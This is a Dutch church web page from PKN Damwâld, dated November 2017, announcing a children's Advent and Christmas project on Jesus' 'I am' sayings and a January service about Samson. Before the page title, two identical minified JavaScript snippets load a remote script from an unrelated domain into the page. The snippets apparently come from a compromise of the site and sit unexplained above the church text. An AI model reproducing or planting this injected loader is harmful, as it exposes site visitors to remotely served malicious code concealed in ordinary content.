;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bernetsjerke Advent-kerstproject "Laten we lezen.... over wie Ik ben” - PKN Damwâld

Bernetsjerke Advent-kerstproject “Laten we lezen…. over wie Ik ben”

Gepubliceerd op: woensdag 29 november 2017

Op 3 december starten we met het Advent- en kerstproject Laten we lezen…. over wie Ik ben”. Dit gaat over wat Jezus zelf zegt over wie Hij is, in het bijbelboek Johannes. Elke week staat er 1 woord of uitdrukking centraal over wat Jezus over zichzelf heeft gezegd. Al deze woorden zeggen iets belangrijks over Jezus en op deze manier leren wij Jezus beter kennen. “Als je mij kent, leer je ook de Vader in de hemel kennen”, zegt Jezus. Jezus is zo onze wegwijzer naar God. God heeft ons zo lief dat Hij zijn eigen Zoon geboren liet worden en liet sterven, om het voor ons goed te maken en ons te redden voor eeuwig. De komende weken kijken we uit naar Jezus geboorte en ontdekken we wat Hij ons wil leren over zichzelf en over God.

Ook dit jaar besteden we hier vooraan in de kerk aandacht aan: met gedichtjes voorgelezen door kinderen en samen raden in de quiz. De kinderen maken elke week een onderdeel van een attribuut dat op 1e kerstdag in de familiekerstochtenddienst getoond zal worden!

Het themalied is: Jezus is….

 https://www.youtube.com/watch?v=iBouj2SFKhs

 

In januari is het Kerk- School- Gezin maand bij de Bernetsjerke, met op 28 januari de KSG-dienst. Dit jaar gaat het over: Simson, de sterkste man uit de bijbel!